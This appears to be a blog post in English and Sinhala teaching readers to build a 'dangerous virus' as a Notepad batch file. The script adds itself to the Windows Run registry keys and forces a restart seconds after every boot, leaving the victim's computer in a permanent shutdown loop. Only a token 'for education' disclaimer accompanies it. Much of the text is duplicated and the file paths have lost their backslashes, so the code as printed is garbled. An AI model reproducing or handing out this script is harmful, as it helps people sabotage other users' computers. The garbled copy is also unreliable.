Make a Dangerous Virus using Notepad
Friends , today I teach you to create a best and most harmful virus using notepad . This is only for education .
Please don't use this codes to harm to others .
If any one open this virus , his computer will shout down all the time when it turn on .
First copy the codes below and
paste it into the notepad . Finally , save it as .bat file .
Please don't use this codes to harm to others .
If any one open this virus , his computer will shout down all the time when it turn on .
First copy the codes below and
paste it into the notepad . Finally , save it as .bat file .
යාලුවනේ මම අද ඔයාලට කියල දෙන්න යන්නේ Notepad එකෙන් තවත් භයානක virus එකක් සාදන ආකාරය .
හැබැයි මේක වෙනත් කෙනෙකුට හින්සාවක් සිදු කරන්න යොදා ගන්න එපා කියලා මම ඔයාලාගෙන් ඉල්ලා සිටිනවා .
මේකෙන් වෙන්නේ ඔයාල පරිගනකය on කරන සෑම වෙලාවකම එය නැවතත් shut down වීමයි .
ඔයාලට කරන්න තියෙන්නේ පහල තියන කෝඩ් ටික copy කරලා Notepad එකට paste කරලා ඒක save කරන විට ඔයාල කැමති නමක් ඒකට දාලා අවසානයට .bat කියලා save කරන එක විතරයි .
eg :- shutdown.bat
ඔන්න තියනවා කෝඩ් ටික .
හැබැයි මේක වෙනත් කෙනෙකුට හින්සාවක් සිදු කරන්න යොදා ගන්න එපා කියලා මම ඔයාලාගෙන් ඉල්ලා සිටිනවා .
මේකෙන් වෙන්නේ ඔයාල පරිගනකය on කරන සෑම වෙලාවකම එය නැවතත් shut down වීමයි .
ඔයාලට කරන්න තියෙන්නේ පහල තියන කෝඩ් ටික copy කරලා Notepad එකට paste කරලා ඒක save කරන විට ඔයාල කැමති නමක් ඒකට දාලා අවසානයට .bat කියලා save කරන එක විතරයි .
eg :- shutdown.bat
ඔන්න තියනවා කෝඩ් ටික .
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

0 comments: